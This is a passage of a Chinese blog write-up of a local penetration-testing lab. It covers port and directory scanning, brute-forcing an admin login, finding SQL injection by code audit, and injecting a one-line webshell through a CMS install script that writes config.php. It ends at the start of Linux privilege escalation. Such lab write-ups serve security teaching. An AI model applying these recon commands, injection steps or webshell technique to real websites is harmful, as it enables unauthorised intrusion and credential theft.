<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="从外网打点到内网漫游-入门级靶场渗透笔记, 远离尘世的幻想乡">
    <meta name="description" content="前言打靶场是网安学习必经之路。一般靶场的洞都很简单，并没有太多技术力。但主要是体会这一个过程，将多个零散技术知识点联合起来进行实战演练，很多东西看看总是简单的，上手实践一下就会发现有些小细节还是得注意。
靶场介绍nasa靶场是综合考核学员能">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=G-6YEVLJ0ZVB"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', 'G-6YEVLJ0ZVB');
</script>


    <title>从外网打点到内网漫游-入门级靶场渗透笔记 | 远离尘世的幻想乡</title>
    <link rel="icon" type="image/png" href="./favicon.png">

    <link rel="stylesheet" type="text/css" href="./libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="./libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="./libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="./libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="./libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="./css/matery.css">
    <link rel="stylesheet" type="text/css" href="./css/my.css">

    <script src="./libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="./atom.xml" title="远离尘世的幻想乡" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="./" class="waves-effect waves-light" id="fixFontSizeToTitle">
                    
                    <img src="./medias/logo.png" class="logo-img" alt="LOGO">
                    
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="./" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="./tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">

      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="./categories/%E6%9D%82%E8%B0%88">
          
          <span>杂谈</span>
        </a>
      </li>
      
      <li>
        <a href="./categories/%E6%B8%97%E9%80%8F">
          
          <span>渗透</span>
        </a>
      </li>
      
      <li>
        <a href="./categories/SRC">
          
          <span>SRC</span>
        </a>
      </li>
      
      <li>
        <a href="./categories/Web">
          
          <span>Web</span>
        </a>
      </li>
      
      <li>
        <a href="./categories/Reverse">
          
          <span>Reverse</span>
        </a>
      </li>
      
      <li>
        <a href="./categories/Crypto">
          
          <span>Crypto</span>
        </a>
      </li>
      
      <li>
        <a href="./categories/Tools">
          
          <span>Tools</span>
        </a>
      </li>
      
      <li>
        <a href="./categories/%E5%BC%80%E5%8F%91">
          
          <span>开发</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="./archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="./about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="./contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="./friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="./medias/logo.png" class="logo-img circle responsive-img">
        <!-- <img src="./medias/logo.png" class="logo-img circle responsive-img"> -->
        
        <div class="logo-name">远离尘世的幻想乡</div>
        <div class="logo-desc">
            
            May the flame guide thee
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="./" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="./tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-bookmark"></i>
			
			分类
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>

                  <a href="./categories/%E6%9D%82%E8%B0%88 " style="margin-left:75px">
				  
		          <span>杂谈</span>
                  </a>
                </li>
              
                <li>

                  <a href="./categories/%E6%B8%97%E9%80%8F " style="margin-left:75px">
				  
		          <span>渗透</span>
                  </a>
                </li>
              
                <li>

                  <a href="./categories/SRC " style="margin-left:75px">
				  
		          <span>SRC</span>
                  </a>
                </li>
              
                <li>

                  <a href="./categories/Web " style="margin-left:75px">
				  
		          <span>Web</span>
                  </a>
                </li>
              
                <li>

                  <a href="./categories/Reverse " style="margin-left:75px">
				  
		          <span>Reverse</span>
                  </a>
                </li>
              
                <li>

                  <a href="./categories/Crypto " style="margin-left:75px">
				  
		          <span>Crypto</span>
                  </a>
                </li>
              
                <li>

                  <a href="./categories/Tools " style="margin-left:75px">
				  
		          <span>Tools</span>
                  </a>
                </li>
              
                <li>

                  <a href="./categories/%E5%BC%80%E5%8F%91 " style="margin-left:75px">
				  
		          <span>开发</span>
                  </a>
                </li>
              
            </ul>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="./archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="./about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="./contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="./friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>
</header>
<script>
    let width=document.documentElement.clientWidth;
    let html_title=''
    if (width<500){
        html_title='<span class="logo-span" style="font-size: 1.2rem;">远离尘世的幻想乡</span>';
    }else{
        html_title='<span class="logo-span">远离尘世的幻想乡</span>';
    }
    document.getElementById("fixFontSizeToTitle").insertAdjacentHTML("beforeEnd", html_title);
</script>
    



<div class="bg-cover pd-header post-cover" style="background-image: url('./medias/featureimages/47.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">从外网打点到内网漫游-入门级靶场渗透笔记</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="./libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="./tags/Web/">
                                <span class="chip bg-color">Web</span>
                            </a>
                        
                            <a href="./tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">内网渗透</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="./categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                渗透
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-04-02
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-01-23
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    20 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="./libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>打靶场是网安学习必经之路。一般靶场的洞都很简单，并没有太多技术力。但主要是体会这一个过程，将多个零散技术知识点联合起来进行实战演练，很多东西看看总是简单的，上手实践一下就会发现有些小细节还是得注意。</p>
<h2 id="靶场介绍"><a href="#靶场介绍" class="headerlink" title="靶场介绍"></a>靶场介绍</h2><p>nasa靶场是综合考核学员能力的项目，主要是考核外网打点到渗透内网域控的综合能力。<br>操作系统包括linux、windows，同存于内网，提供一个公网的web入口点，安全人员对网站&#x2F;服务器进行综合的渗透测试，最终夺取各个服务器的权限。<br>涉及<strong>代码审计、外网打点、多种漏洞配合拿webshell、linux提权、docker逃逸、内网常见漏洞模块利用、内网漫游、域权限的获取</strong>等技术。<br>通过渗透测试方式，获取五个<strong>flag</strong>即可</p>
<h2 id="拓扑图"><a href="#拓扑图" class="headerlink" title="拓扑图"></a>拓扑图</h2><p>拓扑图如下：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/%E9%A1%B9%E7%9B%AE1%E6%8B%93%E6%89%91%E5%9B%BE.jpg" alt="拓扑图"></p>
<p>由于靶机都放在本地，在此用个frp进行内网穿透</p>
<p>vps上的<strong>frps.ini</strong></p>
<pre class="line-numbers language-none"><code class="language-none">[common]
bind_port &#x3D; 7788
token&#x3D;token<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>本地靶机ubuntu的<strong>frpc.ini</strong></p>
<pre class="line-numbers language-none"><code class="language-none">[common]
server_addr &#x3D; 150.140.x.x
server_port &#x3D; 7788
token &#x3D; token
[web]
type &#x3D; tcp
local_ip &#x3D; 127.0.0.1
local_port &#x3D; 80
remote_port &#x3D; 80<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这样，访问<code>http://150.140.x.x:80</code> 就相当于访问<code>http://192.168.110.173</code></p>
<p>在这偷个懒，后面就直接打<code>192.168.110.173</code>，打点的时候注意一下就好。</p>
<h2 id="外网打点"><a href="#外网打点" class="headerlink" title="外网打点"></a>外网打点</h2><p>首先查看界面</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220402220530746.png"></p>
<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p>先masscan扫一下看看，<code>--rate</code>可以调高以加快速度。</p>
<p>masscan比nmap速度快但准确度低，如果什么都没扫出来可以调低速度多试几次。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">masscan -p <span class="token number">1</span>-65535 <span class="token number">192.168</span>.110.173  --rate<span class="token operator">=</span><span class="token number">1000</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220403160639555.png"></p>
<p>再用nmap对扫出的端口进行详细扫描。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">nmap -p <span class="token number">80</span> <span class="token number">192.168</span>.110.173 -Pn -sV -oN result.txt
<span class="token comment">#-Pn 目标机禁用ping，绕过ping扫描</span>
<span class="token comment">#-sV 对端口上的服务程序版本进行扫描</span>
<span class="token comment">#-oN 结果导出</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220403164544877.png"></p>
<p>没有太多利用的点，不过该扫还是得扫，常规操作了。</p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p>接下来就是扫下目录，找个php字典试试</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">ffuf -u <span class="token string">"http://192.168.110.173/FUZZ"</span> -w ./dict.txt -mc <span class="token number">200</span> -fs <span class="token number">0</span> -fl <span class="token number">1241</span>
<span class="token comment"># -mc 200 筛选200状态码</span>
<span class="token comment"># -fs 0 排除size为0的记录</span>
<span class="token comment"># -fl 1241 排除line为1241的记录，主要是排除自动跳转到主页/错误页的记录</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220403215150286.png"></p>
<p>看下robots.txt内容</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405184710263.png"></p>
<p>首先是data存在一个目录浏览器，这样整个站的路径就暴露出来了</p>
<p><code>/data</code>里没啥东西，就存放的一些资源文件，<code>/hook</code>放的一些php文件，其他也基本没啥。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405185047039.png"></p>
<p>翻了翻比较有用的就是<code>/admin</code>，得出后台登录界面<code>/admin/webadmin.php</code></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405191837637.png"></p>
<h3 id="自动漏扫"><a href="#自动漏扫" class="headerlink" title="自动漏扫"></a>自动漏扫</h3><p>那接下来就是对网站进行测试了，再此之前当然得打开xray，说不定会有好事发生</p>
<p>cmd执行：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">xray.exe webscan --listen <span class="token number">127.0</span>.0.1:7777 --html-output nasa.html<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>burpsuite设置上游</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405214152197.png"></p>
<h3 id="弱口令爆破"><a href="#弱口令爆破" class="headerlink" title="弱口令爆破"></a>弱口令爆破</h3><p>打开登录页面，发现登录失败，验证码不变。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405212710041.png"></p>
<p>利用这点，就可以进行后台爆破。</p>
<p>接下来就得对该站进行社工来生成密码，网站的域名&#x2F;标题&#x2F;公司&#x2F;邮箱&#x2F;公司成员信息&#x2F;部门信息等，反正有多少收集多少来组合字典去爆破。</p>
<p>利用<a target="_blank" rel="noopener" href="https://api.xiaobaibk.com/lab/guess/%E8%BF%99%E7%B1%BB%E7%94%9F%E6%88%90%E5%B7%A5%E5%85%B7%E7%94%9F%E6%88%90%E4%B8%80%E4%B8%8B%EF%BC%8C">https://api.xiaobaibk.com/lab/guess/这类生成工具生成一下，</a></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405202626582.png"></p>
<p>然后扔进去，爆破一下得出密码。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405212934927.png"></p>
<p>当然我这里是知道密码，才那么快爆破出来的。如果常用的弱口令破不出来，建议先转换其他目标收集更多信息再尝试。</p>
<h3 id="GoogleHacking"><a href="#GoogleHacking" class="headerlink" title="GoogleHacking"></a>GoogleHacking</h3><p>当然，上面这个弱口令不算。当看到一个CMS第一步要做的，就是Google！</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405214905710.png"></p>
<p>如果能搜到那直接打！搜不到洞就搜源码，把代码扒下来审。</p>
<p>但如果是新入门，那搜不到相关审计文章就不要继续，因为挖0day真的需要时间+精力+经验。</p>
<h3 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h3><p>已知该CMS有洞，下载个源码审计试试。</p>
<p>初学代码审计最怕的是什么？</p>
<blockquote>
<p>1.时间花下去了，什么成果都没有。</p>
<p>2.面对着茫茫多的代码不知从何下手。</p>
</blockquote>
<p>在此讲解一个轻松愉快的代码审计流程。</p>
<p>首先，代码审计一般有两个思路：</p>
<ul>
<li><p>搜危险函数，如<code>system/exec/shell_exec_passthru/eval/file_put_contents/</code>这类去磕，甚至<code>serialize/unserialize</code>去挖反序列化链，也可以搜sql语句来试有没有sql注入。</p>
</li>
<li><p>白盒测试，走走网站流程看看有没有能打的点。比如看到上传点，搜下相关代码上传任意文件；看到?id再去翻代码看看有没有sql注入。<strong>不断走业务</strong>&lt;-&gt;<strong>看代码循环</strong>，这样可以对该CMS的框架有个大致了解。</p>
</li>
</ul>
<p>那新手入门用哪个思路好呢？当然是两个都用啦！</p>
<p>先搜搜看有么有SQL注入，SQL语句相关代码量小，不会像反序列化那样构造链冗长，而且比较容易判断是否存在过滤且能否绕过。</p>
<p>首先搜索mysql&#x2F;mysqli关键字，得出是用<code>mysqli</code></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406172412491.png"></p>
<p>搜个<code>select</code>关键字</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406190704659.png"></p>
<p>当找到sql语句处，第二步就是看该sql语句的参数是否可控。</p>
<p>之前也说，不断走业务看代码循环，虽然很多代码看不懂，但可以了解到哪些目录&#x2F;哪个文件夹是做什么。</p>
<p>比如之前搜<code>select</code>关键字，会发现大部分代码都在这里，</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406185211473.png"></p>
<p>然后上网站随便点点</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406185311676.png"></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406185417883.png"></p>
<p>会发现url构造的<code>/user.php?mod=XXX</code>，这个XXX参数就是文件名。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406185433194.png"></p>
<p>这样，哪怕我没读过代码，不了解他的路由流程，不知道他是怎么执行的，但可以将<strong>某个页面</strong>和<strong>某个PHP文件</strong>对应起来。这样代码量一下就少了很多！</p>
<p>接下来就在<code>/module</code>目录下用正则搜输入点：<code>(\$_GET|\$_POST|\$_REQUEST)</code></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406190619236.png"></p>
<p><code>trim()</code>还能绕过，如果是<code>intval()</code>和<code>floatval()</code>的话可以不用看了，基本上没法利用。堪称sql注入毒瘤。</p>
<p>最终能发现，这里有个sql注入点，且基本无过滤。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220406191228612.png"></p>
<p>而且这个文件是在mobile_index里的，明显，是移动端的形式。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220409223126876.png"></p>
<p>切换成手机模式，然后根据之前猜想的路由规则，访问一下，正确！</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220409224243342.png"></p>
<p>sqlmap跑一下，能行。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220407162828664.png"></p>
<p>跑下账户密码</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220409225542909.png"></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220409225939796.png"></p>
<p>拿到个MD5，解密一下，<code>nasa123</code>。</p>
<p>代码审计涉及到的知识点多而杂，细讲下去篇幅略长，主要还是得自己上手磨。耐着性子狠下功夫，肯定能出货的。</p>
<p>有了账号密码，就能进入后台继续找洞。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405213157220.png"></p>
<p>看了看文件上传的模块，是白名单形式，不好搞。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220410002030790.png"></p>
<p>翻了一圈，什么都没找到，xray倒是扫出个xss，可惜并没有什么用。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220405214214435.png"></p>
<p>然后找找文件写入，老样子，搜下关键字。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220410224417659.png"></p>
<p>第一眼看到这个，感觉有门，curl是存在解析漏洞的，一般拿来SSRF。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220410224452749.png"></p>
<p>但试了很久发现不行。</p>
<p>一般curl去解析<code>http://foo@evil.com</code>，会访问<code>evil.com</code>。</p>
<p>而这里多了个<code>/</code>，<code>http://foo/@evil.com</code>就没法绕过。</p>
<p>然后再找找，发现cms安装代码是将数据库信息组合成字符串再写入到config.php里。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220411100153164.png"></p>
<p>这显然有利用的办法，那访问下试试</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220411100505821.png"></p>
<p>可惜，需要删掉这个文件才行。</p>
<p>找了一圈，没有直截了当的文件写入，只能找找有没有任意文件删除。</p>
<p>在后台把带删除含义的按钮点了个遍，抓到个这个：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220411105455410.png"></p>
<p>代码在<code>admin/module/db.php</code>，很简单，但这个<code>$_g_dbname</code>是怎么回事？搜了一圈都没找到在哪接收的值。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220411105155071.png"></p>
<p>最后找了一圈，发现在<code>common.php</code>里，将接收到的GET和POST的值加个<code>_g</code>前缀利用<code>extract()</code>添加到变量里。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220411105640760.png"></p>
<p>抓个包，打一下：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220411143913714.png"></p>
<p>然后来仔细看看代码，</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">$config = "<span class="token php language-php"><span class="token delimiter important">&lt;?</span>php\n\<span class="token variable">$pe</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'db_host'</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'&#123;$_p_db_host&#125;'</span><span class="token punctuation">;</span> <span class="token comment">//数据库主机地址\n\$pe['db_name'] = '&#123;$_p_db_name&#125;'; //数据库名称\n\$pe['db_user'] = '&#123;$_p_db_user&#125;'; //数据库用户名\n\$pe['db_pw'] = '&#123;$_p_db_pw&#125;'; //数据库密码\n\$pe['db_coding'] = 'utf8';\n\$pe['url_model'] = 'pathinfo_safe'; //url模式,可选项(pathinfo/pathinfo_safe/php)\ndefine('dbpre','&#123;$_p_dbpre&#125;'); //数据库表前缀\n</span><span class="token delimiter important">?></span></span>";
file_put_contents("&#123;$pe['path_root']&#125;config.php", $config);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>在这里可以进行闭合然后写入一句话马。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415195344986.png"></p>
<p>这样，就成功拿到shell了。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415195902641.png"></p>
<p>然后看看禁用的函数，基本没啥禁用，就不用考虑绕过了。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415200029145.png"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>终端看看权限，是www，那么就得提权。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415200434499.png"></p>
<p>Linux提权有很多种方式，常用的suid、sudo，脏牛等，去年还出了个脏管道(Dirty-Pipe)。</p>
<p>先用以下命令找一下带suid的文件：</p>
